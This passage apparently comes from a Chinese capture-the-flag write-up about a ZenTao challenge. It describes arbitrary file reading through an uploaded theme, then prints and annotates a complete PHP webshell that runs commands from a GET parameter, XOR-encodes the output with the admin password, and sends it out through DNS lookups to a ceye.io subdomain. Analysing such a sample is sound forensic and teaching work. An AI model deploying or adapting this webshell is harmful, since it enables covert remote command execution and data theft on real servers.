然后将 default_v3 目录打包成 default_v3.zip,到后台"风格管理"处上传该 zip 文件并启用主题。
此时再去访问模板管理,即可从根目录开始读取服务器上的任意文件(任意文件读取)。
跟之前一样,读取 /proc/1/environ(1 号进程的环境变量,通常为容器入口进程),即可在其中找到 flag。
0x03 hacker
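<?php
// Attacker webshell from the "hacker" section: runs the command supplied in
// ?cmd=, XORs its output with the admin password stored in the ZenTao
// database, and leaks the result out-of-band through DNS lookups of
// *.yafgcy.ceye.io subdomains. Nothing is written to the HTTP response.
//
// NOTE(review): the published listing was mangled by markdown escaping
// (`\_`, `\'`); only those escapes are repaired here. The encoding quirks
// documented below are deliberately left as-is, because a decoder for the
// captured DNS queries has to mirror them exactly.
$servername = "127.0.0.1";
$username = "root";
$password = "123456";
$dbname = "zentao";
$conn = new PDO("mysql:host=$servername;dbname=$dbname", $username, $password);
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// The XOR key is the `password` column of the admin account in zt_user, in
// whatever form the table stores it; recovering that value is the
// prerequisite for decoding the exfiltrated data.
$stmt = $conn->prepare("SELECT password FROM zt_user WHERE account='admin'");
$stmt->execute();
$result = $stmt->fetch(PDO::FETCH_ASSOC);
$conn = null;
// Unvalidated GET parameter passed straight to shell_exec: arbitrary command
// execution by design (this is the webshell, not a bug to fix).
$param = $_GET["cmd"];
// $password is reused: it now holds the admin DB password, not the MySQL one.
$password = $result["password"];
$output = shell_exec($param);
// Both sides are hex-encoded first, so the XOR below works on single hex
// characters (values 0-15), not on raw bytes; dechex() emits lowercase.
$hex_output = bin2hex($output);
$hex_password = bin2hex($password);
$len_output = strlen($hex_output);
// NOTE(review): if the stored password were empty this would be 0 and the
// `%` below would throw a modulo-by-zero error on PHP 8.
$len_password = strlen($hex_password);
// Payload label capped at 62 chars, presumably to stay under the 63-octet
// DNS label limit.
$max_subdomain_length = 62;
$subdomain_base = "yafgcy.ceye.io";
$hex_xor = "";
for ($i = 0; $i < $len_output; $i++) {
    $char_output = $hex_output[$i];
    // The key index is the position in the *whole* output, so it keeps
    // advancing across chunk boundaries, including over the dropped nibble.
    $char_password = $hex_password[$i % $len_password];
    $char_xor = dechex(hexdec($char_output) ^ hexdec($char_password));
    if (strlen($hex_xor . $char_xor) > $max_subdomain_length) {
        // Flush the 62 nibbles collected so far. $char_xor is NOT carried
        // into the fresh buffer, so output nibble 63k+62 is silently lost for
        // every full chunk k: chunk k holds output nibbles 63k..63k+61. A
        // decoder must re-insert that gap when realigning with the key.
        // A flush here always carries exactly 62 (even) chars, so the
        // odd-length padding branch below is dead inside the loop.
        if (strlen($hex_xor) % 2 != 0) {
            $subdomain = "0" . "$hex_xor.$subdomain_base";
        } else {
            $subdomain = "$hex_xor.$subdomain_base";
        }
        gethostbyname($subdomain);
        $hex_xor = "";
    } else {
        $hex_xor .= $char_xor;
    }
}
// Final, possibly short, chunk. An odd number of nibbles is left-padded with
// a "0" so the label decodes as whole bytes; with no command output at all
// this still issues a lookup for ".yafgcy.ceye.io" with an empty label.
if (strlen($hex_xor) % 2 != 0) {
    $subdomain = "0" . "$hex_xor.$subdomain_base";
} else {
    $subdomain = "$hex_xor.$subdomain_base";
}
gethostbyname($subdomain);
?>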
可以看到,命令的执行结果被 XOR 编码后通过 DNS 查询(gethostbyname)外带了,HTTP 响应包中并不会有任何回显。
通过注入查询出来的数据库数据里有 admin 的密码(zt_user 表的 password 字段),它正是上面 webshell 用来做 XOR 的密钥,解码 DNS 外带数据时需要用到。
<xmp class='a-left'>select account,password from zt_user</xmp>{"status":"success","data":"[{\"account\":\"admin\",\"